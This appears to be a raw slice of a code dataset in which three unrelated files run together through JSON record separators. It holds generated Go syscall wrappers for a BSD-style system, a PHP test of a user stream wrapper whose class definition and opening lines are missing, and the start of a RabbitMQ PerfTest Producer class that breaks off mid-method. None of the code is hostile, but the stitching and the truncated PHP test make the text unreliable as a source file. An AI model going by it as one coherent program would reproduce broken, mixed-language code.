EDIT\n\nfunc Rename(from string, to string) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(from)\n\tif err != nil {\n\t\treturn\n\t}\n\tvar _p1 *byte\n\t_p1, err = BytePtrFromString(to)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_RENAME, uintptr(unsafe.Pointer(_p0)), uintptr(unsafe.Pointer(_p1)), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Renameat(fromfd int, from string, tofd int, to string) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(from)\n\tif err != nil {\n\t\treturn\n\t}\n\tvar _p1 *byte\n\t_p1, err = BytePtrFromString(to)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall6(SYS_RENAMEAT, uintptr(fromfd), uintptr(unsafe.Pointer(_p0)), uintptr(tofd), uintptr(unsafe.Pointer(_p1)), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; 
DO NOT EDIT\n\nfunc Revoke(path string) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_REVOKE, uintptr(unsafe.Pointer(_p0)), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Rmdir(path string) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_RMDIR, uintptr(unsafe.Pointer(_p0)), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Seek(fd int, offset int64, whence int) (newoffset int64, err error) {\n\tr0, _, e1 := Syscall(SYS_LSEEK, uintptr(fd), uintptr(offset), uintptr(whence))\n\tnewoffset = int64(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Select(n int, r *FdSet, w *FdSet, e *FdSet, timeout *Timeval) (err error) {\n\t_, _, e1 := Syscall6(SYS_SELECT, uintptr(n), uintptr(unsafe.Pointer(r)), uintptr(unsafe.Pointer(w)), uintptr(unsafe.Pointer(e)), uintptr(unsafe.Pointer(timeout)), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Setegid(egid int) (err error) {\n\t_, _, e1 := RawSyscall(SYS_SETEGID, uintptr(egid), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Seteuid(euid int) (err error) {\n\t_, _, e1 := RawSyscall(SYS_SETEUID, uintptr(euid), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Setgid(gid int) (err error) {\n\t_, _, e1 := RawSyscall(SYS_SETGID, uintptr(gid), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Setlogin(name string) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(name)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_SETLOGIN, uintptr(unsafe.Pointer(_p0)), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Setpgid(pid int, pgid int) (err error) {\n\t_, _, e1 := RawSyscall(SYS_SETPGID, uintptr(pid), uintptr(pgid), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Setpriority(which int, who int, prio int) (err error) {\n\t_, _, e1 := Syscall(SYS_SETPRIORITY, uintptr(which), uintptr(who), uintptr(prio))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Setregid(rgid int, egid int) (err error) {\n\t_, _, e1 := RawSyscall(SYS_SETREGID, uintptr(rgid), uintptr(egid), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Setreuid(ruid int, euid int) (err error) {\n\t_, _, e1 := RawSyscall(SYS_SETREUID, uintptr(ruid), uintptr(euid), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Setresgid(rgid int, egid int, sgid int) (err error) {\n\t_, _, e1 := RawSyscall(SYS_SETRESGID, uintptr(rgid), uintptr(egid), uintptr(sgid))\n\tif e1 != 0 
{\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Setresuid(ruid int, euid int, suid int) (err error) {\n\t_, _, e1 := RawSyscall(SYS_SETRESUID, uintptr(ruid), uintptr(euid), uintptr(suid))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Setrlimit(which int, lim *Rlimit) (err error) {\n\t_, _, e1 := RawSyscall(SYS_SETRLIMIT, uintptr(which), uintptr(unsafe.Pointer(lim)), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Setsid() (pid int, err error) {\n\tr0, _, e1 := RawSyscall(SYS_SETSID, 0, 0, 0)\n\tpid = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Settimeofday(tp *Timeval) (err error) {\n\t_, _, e1 := RawSyscall(SYS_SETTIMEOFDAY, uintptr(unsafe.Pointer(tp)), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Setuid(uid int) (err error) {\n\t_, _, e1 := RawSyscall(SYS_SETUID, uintptr(uid), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Stat(path string, stat *Stat_t) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_STAT, uintptr(unsafe.Pointer(_p0)), uintptr(unsafe.Pointer(stat)), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Statfs(path string, stat *Statfs_t) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_STATFS, uintptr(unsafe.Pointer(_p0)), uintptr(unsafe.Pointer(stat)), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Symlink(path string, link string) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\tvar _p1 *byte\n\t_p1, err = BytePtrFromString(link)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_SYMLINK, uintptr(unsafe.Pointer(_p0)), uintptr(unsafe.Pointer(_p1)), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Symlinkat(oldpath string, newdirfd int, newpath string) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(oldpath)\n\tif err != nil {\n\t\treturn\n\t}\n\tvar _p1 *byte\n\t_p1, err = BytePtrFromString(newpath)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_SYMLINKAT, uintptr(unsafe.Pointer(_p0)), uintptr(newdirfd), uintptr(unsafe.Pointer(_p1)))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Sync() (err error) {\n\t_, _, e1 := Syscall(SYS_SYNC, 0, 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Truncate(path string, length int64) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_TRUNCATE, uintptr(unsafe.Pointer(_p0)), uintptr(length), 0)\n\tif e1 != 0 {\n\t\terr = 
errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Umask(newmask int) (oldmask int) {\n\tr0, _, _ := Syscall(SYS_UMASK, uintptr(newmask), 0, 0)\n\toldmask = int(r0)\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Undelete(path string) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_UNDELETE, uintptr(unsafe.Pointer(_p0)), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Unlink(path string) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_UNLINK, uintptr(unsafe.Pointer(_p0)), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Unlinkat(dirfd int, path string, flags int) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_UNLINKAT, uintptr(dirfd), uintptr(unsafe.Pointer(_p0)), uintptr(flags))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Unmount(path string, flags int) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_UNMOUNT, uintptr(unsafe.Pointer(_p0)), uintptr(flags), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc write(fd int, p []byte) (n int, err error) {\n\tvar _p0 unsafe.Pointer\n\tif len(p) > 0 {\n\t\t_p0 = unsafe.Pointer(&p[0])\n\t} else {\n\t\t_p0 = unsafe.Pointer(&_zero)\n\t}\n\tr0, _, e1 := Syscall(SYS_WRITE, uintptr(fd), uintptr(_p0), uintptr(len(p)))\n\tn = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc mmap(addr uintptr, length uintptr, prot int, flag int, fd int, pos int64) (ret uintptr, err error) {\n\tr0, _, e1 := Syscall6(SYS_MMAP, uintptr(addr), uintptr(length), uintptr(prot), uintptr(flag), uintptr(fd), uintptr(pos))\n\tret = uintptr(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc munmap(addr uintptr, length uintptr) (err error) {\n\t_, _, e1 := Syscall(SYS_MUNMAP, uintptr(addr), uintptr(length), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc readlen(fd int, buf *byte, nbuf int) (n int, err error) {\n\tr0, _, e1 := Syscall(SYS_READ, uintptr(fd), uintptr(unsafe.Pointer(buf)), uintptr(nbuf))\n\tn = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc writelen(fd int, buf *byte, nbuf int) (n int, err error) {\n\tr0, _, e1 := Syscall(SYS_WRITE, uintptr(fd), uintptr(unsafe.Pointer(buf)), uintptr(nbuf))\n\tn = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc accept4(fd int, rsa *RawSockaddrAny, addrlen *_Socklen, flags int) (nfd int, err error) {\n\tr0, _, e1 := Syscall6(SYS_ACCEPT4, uintptr(fd), uintptr(unsafe.Pointer(rsa)), uintptr(unsafe.Pointer(addrlen)), 
uintptr(flags), 0, 0)\n\tnfd = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc utimensat(dirfd int, path string, times *[2]Timespec, flags int) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall6(SYS_UTIMENSAT, uintptr(dirfd), uintptr(unsafe.Pointer(_p0)), uintptr(unsafe.Pointer(times)), uintptr(flags), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n"} {"text": "--TEST--\nfopencookie detected and working (or cast mechanism works)\n--FILE--\ndata, $this->position, $count);\n\t\t$this->position += strlen($ret);\n\t\treturn $ret;\n\t}\n\n\tfunction stream_tell()\n\t{\n\t\treturn $this->position;\n\t}\n\n\tfunction stream_eof()\n\t{\n\t\treturn $this->position >= strlen($this->data);\n\t}\n\n\tfunction stream_seek($offset, $whence)\n\t{\n\t\tswitch($whence) {\n\t\t\tcase SEEK_SET:\n\t\t\t\tif ($offset < strlen($this->data) && $offset >= 0) {\n\t\t\t\t\t$this->position = $offset;\n\t\t\t\t\treturn true;\n\t\t\t\t} else {\n\t\t\t\t\treturn false;\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\tcase SEEK_CUR:\n\t\t\t\tif ($offset >= 0) {\n\t\t\t\t\t$this->position += $offset;\n\t\t\t\t\treturn true;\n\t\t\t\t} else {\n\t\t\t\t\treturn false;\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\tcase SEEK_END:\n\t\t\t\tif (strlen($this->data) + $offset >= 0) {\n\t\t\t\t\t$this->position = strlen($this->data) + $offset;\n\t\t\t\t\treturn true;\n\t\t\t\t} else {\n\t\t\t\t\treturn false;\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\tdefault:\n\t\t\t\treturn false;\n\t\t}\n\t}\n\tfunction stream_stat() {\n\t\treturn array('size' => strlen($this->data));\n\t}\n}\n\nstream_wrapper_register(\"cookietest\", \"userstream\");\n\ninclude(\"cookietest://foo\");\n\n?>\n--EXPECT--\nIf you can read this, it worked\n"} {"text": "// Copyright (c) 2007-2020 Pivotal Software, Inc. All rights reserved.\n//\n// This software, the RabbitMQ Java client library, is triple-licensed under the\n// Mozilla Public License 1.1 (\"MPL\"), the GNU General Public License version 2\n// (\"GPL\") and the Apache License version 2 (\"ASL\"). For the MPL, please see\n// LICENSE-MPL-RabbitMQ. For the GPL, please see LICENSE-GPL2. For the ASL,\n// please see LICENSE-APACHE2.\n//\n// This software is distributed on an \"AS IS\" basis, WITHOUT WARRANTY OF ANY KIND,\n// either express or implied. 
See the LICENSE file for specific language governing\n// rights and limitations of this software.\n//\n// If you have any questions regarding licensing, please contact us at\n// info@rabbitmq.com.\n\npackage com.rabbitmq.perf;\n\nimport com.rabbitmq.client.AMQP;\nimport com.rabbitmq.client.Channel;\nimport com.rabbitmq.client.ConfirmListener;\nimport com.rabbitmq.client.ReturnListener;\nimport org.slf4j.Logger;\nimport org.slf4j.LoggerFactory;\n\nimport java.io.IOException;\nimport java.time.OffsetDateTime;\nimport java.util.Arrays;\nimport java.util.Collection;\nimport java.util.Collections;\nimport java.util.Date;\nimport java.util.HashMap;\nimport java.util.Map;\nimport java.util.Random;\nimport java.util.UUID;\nimport java.util.concurrent.ConcurrentNavigableMap;\nimport java.util.concurrent.ConcurrentSkipListMap;\nimport java.util.concurrent.Semaphore;\nimport java.util.concurrent.TimeUnit;\nimport java.util.concurrent.atomic.AtomicBoolean;\nimport java.util.concurrent.atomic.AtomicInteger;\nimport java.util.function.Function;\nimport java.util.function.Supplier;\n\nimport static java.util.stream.Collectors.toMap;\n\npublic class Producer extends AgentBase implements Runnable, ReturnListener,\n ConfirmListener\n{\n\n private static final Logger LOGGER = LoggerFactory.getLogger(Producer.class);\n\n public static final String TIMESTAMP_PROPERTY = \"timestamp\";\n public static final String CONTENT_TYPE_PROPERTY = \"contentType\";\n public static final String CONTENT_ENCODING_PROPERTY = \"contentEncoding\";\n public static final String DELIVERY_MODE_PROPERTY = \"deliveryMode\";\n public static final String PRIORITY_PROPERTY = \"priority\";\n public static final String CORRELATION_ID_PROPERTY = \"correlationId\";\n public static final String REPLY_TO_PROPERTY = \"replyTo\";\n public static final String EXPIRATION_PROPERTY = \"expiration\";\n public static final String MESSAGE_ID_PROPERTY = \"messageId\";\n public static final String TYPE_PROPERTY = \"type\";\n public static final String USER_ID_PROPERTY = \"userId\";\n public static final String APP_ID_PROPERTY = \"appId\";\n public static final String CLUSTER_ID_PROPERTY = \"clusterId\";\n public static final String TIMESTAMP_HEADER = TIMESTAMP_PROPERTY;\n static final String STOP_REASON_PRODUCER_MESSAGE_LIMIT = \"Producer reached message limit\";\n static final String STOP_REASON_PRODUCER_THREAD_INTERRUPTED = \"Producer thread interrupted\";\n static final String STOP_REASON_ERROR_IN_PRODUCER = \"Error in producer\";\n private final Channel channel;\n private final String exchangeName;\n private final String id;\n private final boolean mandatory;\n private final boolean persistent;\n private final int txSize;\n private final int msgLimit;\n\n private final Stats stats;\n\n private final MessageBodySource messageBodySource;\n\n private final Function propertiesBuilderProcessor;\n private final Semaphore confirmPool;\n private final int confirmTimeout;\n private final int maxOutstandingConfirms;\n\n private final ConcurrentNavigableMap unconfirmed = new ConcurrentSkipListMap<>();\n\n private final MulticastSet.CompletionHandler completionHandler;\n private final AtomicBoolean completed = new AtomicBoolean(false);\n\n private final Supplier routingKeyGenerator;\n\n private final int randomStartDelay;\n\n private final Recovery.RecoveryProcess recoveryProcess;\n\n private final boolean shouldTrackPublishConfirms;\n\n private final TimestampProvider timestampProvider;\n\n private final ValueIndicator rateIndicator;\n\n public 
Producer(ProducerParameters parameters) {\n this.channel = parameters.getChannel();\n this.exchangeName = parameters.getExchangeName();\n this.id = parameters.getId();\n this.mandatory = parameters.getFlags().contains(\"mandatory\");\n this.persistent = parameters.getFlags().contains(\"persistent\");\n\n Function builderProcessor = Function.identity();\n this.txSize = parameters.getTxSize();\n this.msgLimit = parameters.getMsgLimit();\n this.messageBodySource = parameters.getMessageBodySource();\n this.timestampProvider = parameters.getTsp();\n if (this.timestampProvider.isTimestampInHeader()) {\n builderProcessor = builderProcessor.andThen(builder -> builder.headers(Collections.singletonMap(TIMESTAMP_HEADER, parameters.getTsp().getCurrentTime())));\n }\n if (parameters.getMessageProperties() != null && !parameters.getMessageProperties().isEmpty()) {\n builderProcessor = builderProcessorWithMessageProperties(parameters.getMessageProperties(), builderProcessor);\n }\n\n this.shouldTrackPublishConfirms = shouldTrackPublishConfirm(parameters);\n\n if (parameters.getConfirm() > 0) {\n this.confirmPool = new Semaphore((int) parameters.getConfirm());\n this.confirmTimeout = parameters.getConfirmTimeout();\n this.maxOutstandingConfirms = (int) parameters.getConfirm();\n } else {\n this.confirmPool = null;\n this.confirmTimeout = -1;\n this.maxOutstandingConfirms = -1;\n }\n this.stats = parameters.getStats();\n this.completionHandler = parameters.getCompletionHandler();\n this.propertiesBuilderProcessor = builderProcessor;\n if (parameters.isRandomRoutingKey() || parameters.getRoutingKeyCacheSize() > 0) {\n if (parameters.getRoutingKeyCacheSize() > 0) {\n this.routingKeyGenerator = new CachingRoutingKeyGenerator(parameters.getRoutingKeyCacheSize());\n } else {\n this.routingKeyGenerator = () -> UUID.randomUUID().toString();\n }\n } else {\n this.routingKeyGenerator = () -> this.id;\n }\n this.randomStartDelay = parameters.getRandomStartDelayInSeconds();\n\n this.rateIndicator = parameters.getRateIndicator();\n this.recoveryProcess = parameters.getRecoveryProcess();\n this.recoveryProcess.init(this);\n\n }\n\n private Function builderProcessorWithMessageProperties(\n Map messageProperties,\n Function builderProcessor) {\n if (messageProperties.containsKey(CONTENT_TYPE_PROPERTY)) {\n String value = messageProperties.get(CONTENT_TYPE_PROPERTY).toString();\n builderProcessor = builderProcessor.andThen(builder -> builder.contentType(value));\n }\n if (messageProperties.containsKey(CONTENT_ENCODING_PROPERTY)) {\n String value = messageProperties.get(CONTENT_ENCODING_PROPERTY).toString();\n builderProcessor = builderProcessor.andThen(builder -> builder.contentEncoding(value));\n }\n if (messageProperties.containsKey(DELIVERY_MODE_PROPERTY)) {\n Integer value = ((Number) messageProperties.get(DELIVERY_MODE_PROPERTY)).intValue();\n builderProcessor = builderProcessor.andThen(builder -> builder.deliveryMode(value));\n }\n if (messageProperties.containsKey(PRIORITY_PROPERTY)) {\n Integer value = ((Number) messageProperties.get(PRIORITY_PROPERTY)).intValue();\n builderProcessor = builderProcessor.andThen(builder -> builder.priority(value));\n }\n if (messageProperties.containsKey(CORRELATION_ID_PROPERTY)) {\n String value = messageProperties.get(CORRELATION_ID_PROPERTY).toString();\n builderProcessor = builderProcessor.andThen(builder -> builder.correlationId(value));\n }\n if (messageProperties.containsKey(REPLY_TO_PROPERTY)) {\n String value = messageProperties.get(REPLY_TO_PROPERTY).toString();\n 
builderProcessor = builderProcessor.andThen(builder -> builder.replyTo(value));\n }\n if (messageProperties.containsKey(EXPIRATION_PROPERTY)) {\n String value = messageProperties.get(EXPIRATION_PROPERTY).toString();\n builderProcessor = builderProcessor.andThen(builder -> builder.expiration(value));\n }\n if (messageProperties.containsKey(MESSAGE_ID_PROPERTY)) {\n String value = messageProperties.get(MESSAGE_ID_PROPERTY).toString();\n builderProcessor = builderProcessor.andThen(builder -> builder.messageId(value));\n }\n if (messageProperties.containsKey(TIMESTAMP_PROPERTY)) {\n String value = messageProperties.get(TIMESTAMP_PROPERTY).toString();\n Date timestamp = Date.from(OffsetDateTime.parse(value).toInstant());\n builderProcessor = builderProcessor.andThen(builder -> builder.timestamp(timestamp));\n }\n if (messageProperties.containsKey(TYPE_PROPERTY)) {\n String value = messageProperties.get(TYPE_PROPERTY).toString();\n builderProcessor = builderProcessor.andThen(builder -> builder.type(value));\n }\n if (messageProperties.containsKey(USER_ID_PROPERTY)) {\n String value = messageProperties.get(USER_ID_PROPERTY).toString();\n builderProcessor = builderProcessor.andThen(builder -> builder.userId(value));\n }\n if (messageProperties.containsKey(APP_ID_PROPERTY)) {\n String value = messageProperties.get(APP_ID_PROPERTY).toString();\n builderProcessor = builderProcessor.andThen(builder -> builder.appId(value));\n }\n if (messageProperties.containsKey(CLUSTER_ID_PROPERTY)) {\n String value = messageProperties.get(CLUSTER_ID_PROPERTY).toString();\n builderProcessor = builderProcessor.andThen(builder -> builder.clusterId(value));\n }\n\n final Map headers = messageProperties.entrySet().stream()\n .filter(entry -> !isPropertyKey(entry.getKey()))\n .collect(toMap(e -> e.getKey(), e -> e.getValue()));\n\n if (!headers.isEmpty()) {\n builderProcessor = builderProcessor.andThen(builder -> {\n // we merge if there are already some headers\n AMQP.BasicProperties properties = builder.build();\n Map existingHeaders = properties.getHeaders();\n if (existingHeaders != null && !existingHeaders.isEmpty()) {\n Map newHeaders = new HashMap<>();\n newHeaders.putAll(existingHeaders);\n newHeaders.putAll(headers);\n builder = builder.headers(newHeaders);\n } else {\n builder = builder.headers(headers);\n }\n return builder;\n });\n }\n\n return builderProcessor;\n }\n\n private static final Collection MESSAGE_PROPERTIES_KEYS = Arrays.asList(\n CONTENT_TYPE_PROPERTY,\n CONTENT_ENCODING_PROPERTY,\n \"headers\",\n DELIVERY_MODE_PROPERTY,\n PRIORITY_PROPERTY,\n CORRELATION_ID_PROPERTY,\n REPLY_TO_PROPERTY,\n EXPIRATION_PROPERTY,\n MESSAGE_ID_PROPERTY,\n TIMESTAMP_HEADER,\n TYPE_PROPERTY,\n USER_ID_PROPERTY,\n APP_ID_PROPERTY,\n CLUSTER_ID_PROPERTY\n );\n\n private boolean isPropertyKey(String key) {\n return MESSAGE_PROPERTIES_KEYS.contains(key);\n }\n\n private boolean shouldTrackPublishConfirm(ProducerParameters parameters) {\n return parameters.getConfirm() > 0;\n }\n\n public void handleReturn(int replyCode,\n String replyText,\n String exchange,\n String routingKey,\n AMQP.BasicProperties properties,\n byte[] body) {\n stats.handleReturn();\n }\n\n public void handleAck(long seqNo, boolean multiple) {\n handleAckNack(seqNo, multiple, false);\n }\n\n public void handleNack(long seqNo, boolean multiple) {\n handleAckNack(seqNo, multiple, true);\n }\n\n private void handleAckNack(long seqNo, boolean multiple,\n boolean nack) {\n int numConfirms;\n\n if (nack) {\n numConfirms = processNack(seqNo, multiple);\n } 
else {\n numConfirms = processAck(seqNo, multiple);\n }\n\n if (confirmPool != null && numConfirms > 0) {\n confirmPool.release(numConfirms);\n }\n }\n\n private int processAck(long seqNo, boolean multiple) {\n int numConfirms;\n long currentTime = this.timestampProvider.getCurrentTime();\n long[] latencies;\n if (multiple) {\n ConcurrentNavigableMap confirmed = unconfirmed.headMap(seqNo, true);\n numConfirms = confirmed.size();\n latencies = new long[numConfirms];\n int index = 0;\n for (Map.Entry entry : confirmed.entrySet()) {\n latencies[index] = this.timestampProvider.getDifference(currentTime, entry.getValue());\n index++;\n }\n confirmed.clear();\n } else {\n Long messageTimestamp = unconfirmed.remove(seqNo);\n if (messageTimestamp != null) {\n latencies = new long[] {this.timestampProvider.getDifference(currentTime, messageTimestamp)};\n } else {\n latencies = new long[0];\n }\n numConfirms = 1;\n }\n stats.handleConfirm(numConfirms, latencies);\n return numConfirms;\n }\n\n private int processNack(long seqNo, boolean multiple) {\n int numConfirms;\n if (multiple) {\n ConcurrentNavigableMap confirmed = unconfirmed.headMap(seqNo, true);\n numConfirms = confirmed.size();\n confirmed.clear();\n } else {\n unconfirmed.remove(seqNo);\n numConfirms = 1;\n }\n stats.handleNack(numConfirms);\n return numConfirms;\n }\n\n public void run() {\n if (randomStartDelay > 0) {\n int delay = new Random().nextInt(randomStartDelay) + 1;\n try {\n Thread.sleep((long) delay * 1000);\n } catch (InterruptedException e) {\n Thread.currentThread().interrupt();\n throw new RuntimeException(e);\n }\n }\n long now;\n final long startTime;\n startTime = now = System.currentTimeMillis();\n ProducerState state = new ProducerState(this.rateIndicator);\n state.setLastStatsTime(startTime);\n state.setMsgCount(0);\n final boolean variableRate = this.rateIndicator.isVariable();\n try {\n while (keepGoing(state)) {\n delay(now, state);\n if (variableRate && this.rateIndicator.getValue() == 0.0f) {\n // instructed not to publish, so waiting\n waitForOneSecond();\n } else {\n handlePublish(state);\n }\n now = System.currentTimeMillis();\n // if rate is variable, we need to reset producer stats every second\n // otherwise pausing to throttle rate will be based on the whole history\n // which is broken when rate varies\n if (variableRate && now - state.getLastStatsTime() > 1000) {\n state.setLastStatsTime(now);\n state.setMsgCount(0);\n }\n }\n } catch (PerfTestException pte) {\n countDown(pte.getMessage());\n throw pte;\n } catch (Exception e) {\n 